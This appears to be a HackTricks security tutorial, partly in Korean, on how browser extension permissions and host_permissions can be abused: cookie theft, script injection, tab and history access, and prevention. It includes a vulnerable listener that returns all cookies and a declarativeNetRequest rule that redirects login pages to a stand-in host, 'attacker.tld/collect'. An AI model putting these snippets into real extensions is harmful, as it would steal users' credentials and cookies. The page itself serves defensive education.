BrowExt - permissions & host_permissions

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

Basic Information

permissions

Permissions은 확장 프로그램의 manifest.json 파일에서 permissions 속성으로 정의되며, 브라우저가 접근할 수 있는 거의 모든 것(Cookies or Physical Storage)에 대한 접근을 허용합니다:

이전 manifest는 확장 기능이 storage 권한을 필요로 한다고 선언합니다. 이는 the storage API를 사용해 데이터를 영구적으로 저장할 수 있음을 의미합니다. 사용자에게 어느 정도 제어권을 주는 cookies나 localStorage API와 달리, extension storage는 보통 확장 프로그램을 제거해야만 삭제할 수 있습니다.

확장 기능은 자신의 manifest.json 파일에 표시된 권한을 요청하며, 확장 기능을 설치한 후에는 브라우저에서 언제든지 해당 권한을 확인할 수 있습니다, 아래 이미지와 같이:

You can find the complete list of permissions a Chromium Browser Extension can request here and a complete list for Firefox extensions here.

host_permissions

선택사항이지만 강력한 설정인 host_permissions 는 확장 기능이 cookies, webRequest, tabs 같은 API를 통해 어떤 호스트와 상호작용할 수 있을지를 지정합니다.

The following host_permissions basically allow every web:

"host_permissions": [
"*://*/*"
]

// Or:
"host_permissions": [
"http://*/*",
"https://*/*"
]

// Or:
"host_permissions": [
"<all_urls>"
]

다음은 브라우저 확장 기능이 자유롭게 접근할 수 있는 호스트들입니다. 이는 브라우저 확장 프로그램이 fetch("https://gmail.com/") 를 호출할 때 CORS 제한을 받지 않기 때문입니다.

permissionshost_permissions 악용

Cookies

The cookies permission allows the extension to access all the cookies of the browser. In this blog post this permissions was abused through a vulnerable backdound script to abuse a browser extension to give the attacker all cookies of the browser of the victim user that accessed the malicious web page. The vulnerable code was just sending back all the cookies:

chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if (request.action == "getCookies") {
chrome.cookies.getAll({}, function(cookies) {
sendResponse({data: cookies});
});
}
return true;
}
);

Tabs

Moreover, host_permissions also unlock “advanced” tabs API functionality. They allow the extension to call tabs.query() and not only get a list of user’s browser tabs back but also learn which web page (meaning address and title) is loaded.

Caution

Not only that, listeners like tabs.onUpdated become way more useful as well. These will be notified whenever a new page loads into a tab.

Running content scripts

Content scripts aren’t necessarily written statically into the extension manifest. Given sufficient host_permissions, extensions can also load them dynamically by calling tabs.executeScript() or scripting.executeScript().

Both APIs allow executing not merely files contained in the extensions as content scripts but also arbitrary code. The former allows passing in JavaScript code as a string while the latter expects a JavaScript function which is less prone to injection vulnerabilities. Still, both APIs will wreak havoc if misused.

Caution

In addition to the capabilities above, content scripts could for example intercept credentials as these are entered into web pages. Another classic way to abuse them is injecting advertising on each an every website. Adding scam messages to abuse credibility of news websites is also possible. Finally, they could manipulate banking websites to reroute money transfers.

Implicit privileges

Some extension privileges don’t have to be explicitly declared. One example is the tabs API: its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.

Sounds too harmless? The tabs.create() API is somewhat less so. It can be used to create a new tab, essentially the same as window.open() which can be called by any website. Yet while window.open() is subject to the pop-up blocker, tabs.create() isn’t.

Caution

An extension can create any number of tabs whenever it wants.

If you look through possible tabs.create() parameters, you’ll also notice that its capabilities go way beyond what window.open() is allowed to control. And while Firefox doesn’t allow data: URIs to be used with this API, Chrome has no such protection. Use of such URIs on the top level has been banned due to being abused for phishing.

tabs.update() is very similar to tabs.create() but will modify an existing tab. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.

Webcam, geolocation and friends

You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.

Caution

Not so with browser extensions. If a browser extension wants access to your webcam or microphone, it only needs to ask for permission once

Typically, an extension will do so immediately after being installed. Once this prompt is accepted, webcam access is possible at any time, even if the user isn’t interacting with the extension at this point. Yes, a user will only accept this prompt if the extension really needs webcam access. But after that they have to trust the extension not to record anything secretly.

With access to your exact geographical location or contents of your clipboard, granting permission explicitly is unnecessary altogether. An extension simply adds geolocation or clipboard to the permissions entry of its manifest. These access privileges are then granted implicitly when the extension is installed. So a malicious or compromised extension with these privileges can create your movement profile or monitor your clipboard for copied passwords without you noticing anything.

Adding the history keyword to the permissions entry of the extension manifest grants access to the history API. It allows retrieving the user’s entire browsing history all at once, without waiting for the user to visit these websites again.

The bookmarks permission has similar abuse potential, this one allows reading out all bookmarks via the bookmarks API.

Storage permission

The extension storage is merely a key-value collection, very similar to localStorage that any website could use. So no sensitive information should be stored here.

However, advertising companies could also abuse this storage.

More permissions

Manifest V3 split page access from API permissions: permissions still governs privileged APIs (cookies, tabs, history, scripting, etc.) while host_permissions controls which origins those APIs can touch. MV3 also made host permissions runtime‑grantable, so extensions can ship with none and pop a consent prompt later via chrome.permissions.request()—handy for legit least‑privilege flows, but also abused by malware to escalate after reputation is established.

A stealthy variant is declarativeNetRequestWithHostAccess (Chrome ≥96). It provides the same request‑blocking/redirect power as declarativeNetRequest but shows a weaker install prompt than <all_urls> host permissions. Malicious extensions use it to silently get “block/redirect on any site” capability; test prompts with chrome://extensions/?errors and chrome://extensions/?id=<id>.

declarativeNetRequest dynamic rules let an extension reprogram network policy at runtime. With <all_urls> host access an attacker can weaponise it to hijack traffic or data exfil. Example:

chrome.declarativeNetRequest.updateDynamicRules({
addRules: [{
id: 9001,
priority: 1,
action: {
type: "redirect",
redirect: { url: "https://attacker.tld/collect" }
},
condition: { urlFilter: "|http*://*/login", resourceTypes: ["main_frame"] }
}]
});

Chrome는 MV3 규칙 한도를 상향 조정했습니다 (≈330k static / 30k dynamic). 따라서 대규모 커버리지 세트로 가로채기/광고 삽입이 현실적으로 가능해졌습니다.

최근 악용 패턴

  • 공급망 트로이화된 업데이트: 도용된 개발자 계정이 MV3 업데이트를 푸시하면서 <all_urls>declarativeNetRequest/scripting/webRequest를 추가해 원격 JS를 주입하고 헤더/DOM 콘텐츠를 유출합니다.
  • 지갑 탈취: 호스트 접근권한과 storagetabs 조합으로 백도어된 지갑 확장 기능이 시드(seed)를 유출할 수 있습니다; 도용된 Web Store API keys는 악성 빌드를 배포하는 데 사용된 사례가 있습니다.
  • 쿠키 탈취: cookies 권한과 광범위한 호스트 접근을 가진 확장 기능은 HttpOnly에도 불구하고 인증 쿠키를 읽을 수 있습니다 — 해당 조합을 자격증명 탈취 가능으로 간주하세요.

예방

Google의 개발자 정책은 확장 기능이 기능에 필요한 것보다 더 많은 권한을 요청하는 것을 명시적으로 금지하고 있어 과도한 권한 요청을 실효적으로 억제합니다. 확장 기능이 이 한계를 넘은 사례로는 애드온 스토어가 아니라 브라우저 자체에 번들되어 배포된 경우가 있습니다.

브라우저는 확장 권한의 오남용을 더 억제할 수 있습니다. 예를 들어, 화면 녹화에 사용되는 Chrome의 tabCapturedesktopCapture APIs는 남용을 최소화하도록 설계되어 있습니다. tabCapture API는 확장 아이콘 클릭 같은 직접적인 사용자 상호작용을 통해서만 활성화될 수 있고, desktopCapture는 기록할 창에 대해 사용자 확인이 필요해 은밀한 녹화를 방지합니다.

그러나 보안 조치를 강화하면 종종 확장 기능의 유연성과 사용자 편의성이 저하됩니다. activeTab permission이 이 균형을 잘 보여줍니다. 이 권한은 확장 기능이 인터넷 전체에 대한 호스트 권한을 요청할 필요를 없애기 위해 도입되었으며, 사용자가 명시적으로 활성화했을 때 현재 탭에만 접근을 허용합니다. 이 모델은 사용자 주도 동작이 필요한 확장에는 효과적이지만 자동 또는 사전 조치가 필요한 경우에는 적합하지 않아 편의성과 즉각적 응답성을 저하시킵니다.

참고자료

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기